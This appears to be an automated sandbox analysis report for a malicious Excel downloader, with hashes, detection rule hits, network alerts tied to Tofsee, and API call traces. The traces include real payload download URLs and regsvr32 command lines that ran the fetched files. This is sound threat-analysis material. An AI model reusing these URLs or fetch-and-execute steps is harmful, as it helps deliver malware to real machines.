Summary | ZeroBOX

index-294441975.xls

Downloader MSOffice File
Category Machine Started Completed
FILE s1_win7_x6403_us Nov. 5, 2021, 9:42 a.m. Nov. 5, 2021, 9:46 a.m.
Size 109.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:19:34 2015, Last Saved Time/Date: Thu Nov 4 14:50:52 2021, Security: 0
MD5 294c6091ed8f9b30fabca946bc2e48ee
SHA256 1f7c517b6a3bef448304cee76f5398374307a01300587760ac037839154f02e9
CRC32 61F6DD5A
ssdeep 3072:JKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgiMjmwHAfvperDmC:JKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgiA
Yara
  • Microsoft_Office_File_Downloader_Zero - Microsoft Office File Downloader
  • Microsoft_Office_File_Zero - Microsoft Office File

IP Address Status Action
108.179.192.18 Active Moloch
108.179.193.34 Active Moloch
164.124.101.2 Active Moloch
23.111.163.242 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49167 -> 108.179.192.18:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49163 -> 108.179.193.34:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49164 -> 108.179.193.34:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49168 -> 108.179.192.18:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 108.179.193.34:443 -> 192.168.56.103:49165 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 108.179.192.18:443 -> 192.168.56.103:49169 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49172 -> 23.111.163.242:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 23.111.163.242:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49172 -> 23.111.163.242:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49173 -> 23.111.163.242:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49173 -> 23.111.163.242:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 192.168.56.103:49171 -> 23.111.163.242:443 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49171 -> 23.111.163.242:443 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 23.111.163.242:443 -> 192.168.56.103:49172 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 192.168.56.103:49171 -> 23.111.163.242:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 23.111.163.242:443 -> 192.168.56.103:49172 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 23.111.163.242:443 -> 192.168.56.103:49173 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 23.111.163.242:443 -> 192.168.56.103:49173 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode
TCP 23.111.163.242:443 -> 192.168.56.103:49171 2230002 SURICATA TLS invalid record type Generic Protocol Command Decode
TCP 23.111.163.242:443 -> 192.168.56.103:49171 2230010 SURICATA TLS invalid record/traffic Generic Protocol Command Decode

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bd28000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6ae52000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2612
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c201000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2572
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c201000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2652
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c201000
process_handle: 0xffffffff
1 0 0
cmdline regsvr32 C:\Datop\good.good
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\good1.good
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\good.good
cmdline regsvr32 C:\Datop\good1.good
cmdline "C:\Windows\System32\regsvr32.exe" C:\Datop\good2.good
cmdline regsvr32 C:\Datop\good2.good
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2352
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef60000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: https://decinfo.com.br/s4hfZyv7NFEM/y9.html
stack_pivoted: 0
filepath_r: C:\Datop\good.good
filepath: C:\Datop\good.good
2148270085 0

URLDownloadToFileW

url: https://imprimija.com.br/BIt2Zlm3/y5.html
stack_pivoted: 0
filepath_r: C:\Datop\good1.good
filepath: C:\Datop\good1.good
2148270085 0

URLDownloadToFileW

url: https://stunningmax.com/JR3xNs7W7Wm1/y1.html
stack_pivoted: 0
filepath_r: C:\Datop\good2.good
filepath: C:\Datop\good2.good
2148270085 0
parent_process excel.exe martian_process regsvr32 C:\Datop\good.good
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\good1.good
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\good.good
parent_process excel.exe martian_process regsvr32 C:\Datop\good1.good
parent_process excel.exe martian_process "C:\Windows\System32\regsvr32.exe" C:\Datop\good2.good
parent_process excel.exe martian_process regsvr32 C:\Datop\good2.good
file C:\Windows\System32\regsvr32.exe